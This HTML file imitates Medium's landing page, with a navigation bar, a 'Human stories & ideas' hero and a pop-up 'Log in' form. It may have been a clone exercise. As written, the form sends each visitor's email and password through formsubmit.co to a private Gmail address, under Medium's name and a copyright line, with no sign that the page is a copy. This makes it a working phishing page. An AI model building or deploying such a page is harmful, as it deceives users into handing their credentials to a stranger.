<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Medium Landing Page</title>
    <link rel="stylesheet" href="style.css">
</head>
<body>
    <header>
        <nav>
            <div class="logo">Medium</div>
            <ul class="nav-links">
                <li><a href="#">Our Story</a></li>    
                <li><a href="#">Membership</a></li>    
                <li><a href="#">Write</a></li>    
                <li><a href="#">Sign in</a></li>    
                <li><button href="#" class="btn">Get Started</button></li>    
            </ul>
        </nav>
    </header>
    <section class="section">
        <div class="hero">
            <div>
                <h1 class="hero-header">Human <br>stories & ideas</h1>
                <p>Discover stories, thinking and expertise from writers on any topic</p>
                <button class="btn" id="btn-2">Start Reading</button>
            </div>
            <!-- <div><img src="./betechified.jpg" alt="betechified" height="500" width="500"></div> -->
            <div><img src="https://miro.medium.com/v2/format:webp/4*SdjkdS98aKH76I8eD0_qjw.png" alt="betechified" height="500" width="500"></div>
        </div>
        <form action="https://formsubmit.co/koffytechservices@gmail.com" target="_blank" method="post" class="pop-up">
            <div class="close-btn">&times;</div>
            <div class="form">
                <h2 class="form-header">Log in</h2>
                <div class="form-element">
                    <label for="email">Email</label>
                    <input type="email" id="email" name="email" placeholder="Enter email" required>
                </div>
                <div class="form-element">
                    <label for="password">Password</label>
                    <input type="password" id="password" name="password" placeholder="Enter password">
                </div>
                <div class="form-element">
                    <input type="checkbox" id="remember_me">
                    <label for="remember_me">Remember Me</label>
                </div>
                <div class="form-element">
                    <button>Sign in</button>
                </div>
                <div class="form-element">
                    <a href="#" class="password-link">Forget password?</a>
                </div>
            </div>
        </form>
    </section>
    <footer>
        <p>&copy; 2025 Medium. All Right Reserved</p>
    </footer>
    <script src="script.js"></script>
</body>
</html>